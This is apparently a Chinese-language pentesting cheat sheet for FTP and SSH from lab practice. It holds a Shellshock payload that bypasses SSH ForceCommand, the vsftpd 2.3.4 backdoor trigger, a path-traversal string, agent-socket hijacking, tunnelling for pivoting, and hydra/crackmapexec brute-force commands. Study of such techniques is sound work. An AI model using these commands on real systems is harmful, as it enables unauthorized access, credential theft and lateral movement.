常规登录,默认端口21
sudo ftp 192.168.2.140
指定端口登录
sudo ftp 192.168.2.140 2121
可以尝试用anonymous+空密码匿名登录 进去后先切换binary mode防止下载文件发生乱码
ProFTPD 1.3.5 的 mod_copy 漏洞:允许远程代码执行(RCE)
vsftpd 2.3.4 笑脸后门:如果在用户名后面输入 :),服务器会直接在 6200 端口开启一个 Shell。
../../../etc/passwd 可能存在目录穿越
]]>ssh username@192.168.1.2
ssh-keygen -t ed25519 -C "备注内容" #生成密钥对
sudo ssh -i id_ed25519 smbuser@192.168.2.129 #私钥连接
ssh -o ServerAliveInterval=60 user@host
每 60 秒自动发一个心跳包,维持连接。
出现
┌──(kali㉿kali)-[~]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 dstevens@192.168.2.129 Unable to negotiate with 192.168.2.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
通常是我们的ssh版本过高,服务端版本过低,更改进入时的配置即可生效
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa,ssh-dss dstevens@192.168.2.129
-oKexAlgorithms=+diffie-hellman-group1-sha1: 允许使用diffie-hellman-group1-sha1密钥交换算法。-oHostKeyAlgorithms=+ssh-rsa,ssh-dss: 允许使用ssh-rsa和ssh-dss host key类型。出现Permissions 0777 for 'id_ed25519' are too open.
私钥权限过大(如777),改为600即可
当 SSH 配置了强制执行命令(ForceCommand)时,如果系统 Bash 版本存在漏洞,攻击者可以通过环境变量注入恶意的 Bash 函数,从而绕过原本的命令限制,获取完整的 Shell。 如果可以传参,为什么不试试呢
ssh john@192.168.56.101 /bin/bash
ssh -i noob noob@10.0.2.30 '() { :;}; /bin/bash'
python ssh_enum.py <目标IP地址> -U <用户名列表>
git clone https://github.com/g0tmi1k/debian-ssh.git
cd debian-ssh
./find_key.py <目标IP地址> <用户账号>
将远程服务器的某个端口映射到本地。 场景: 目标内网有一台数据库(3306),只有 SSH 机器能访问,你想在本地用图形化工具连接。
ssh -L 3306:127.0.0.1:3306 user@192.168.2.129
将本地端口映射到远程服务器。 场景: 你在内网,没有公网 IP,想让公网的 VPS 访问你的本地服务。
ssh -R 8080:127.0.0.1:80 user@vps_ip
建立 SOCKS5 代理。所有经过本地1080端口的流量都被转发到vps
ssh -D 1080 user@192.168.2.129
当用户使用SSH Agent并开启了“转发”(-A 参数)连接到一台跳板机时,用户的本地私钥能力会通过一个Unix Domain Socket文件临时映射到跳板机上。
这个Socket文件通常存放在跳板机的/tmp目录下。如果跳板机上的root用户是攻击者,或者攻击者拥有读取该目录的权限,他们就可以直接“借用”这个用户的身份登录内网的其他机器
ls -al /tmp/ssh-*
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.XXXX
ssh user@内网其他机器
sudo crackmapexec ssh 192.168.2.137 -u user.lst -p pass.lst
]]>
crackmapexec的截图待补,先保留命令示例。hydra
hydra -L user.txt -P pass.txt ssh://192.168.2.137 -t 4 -V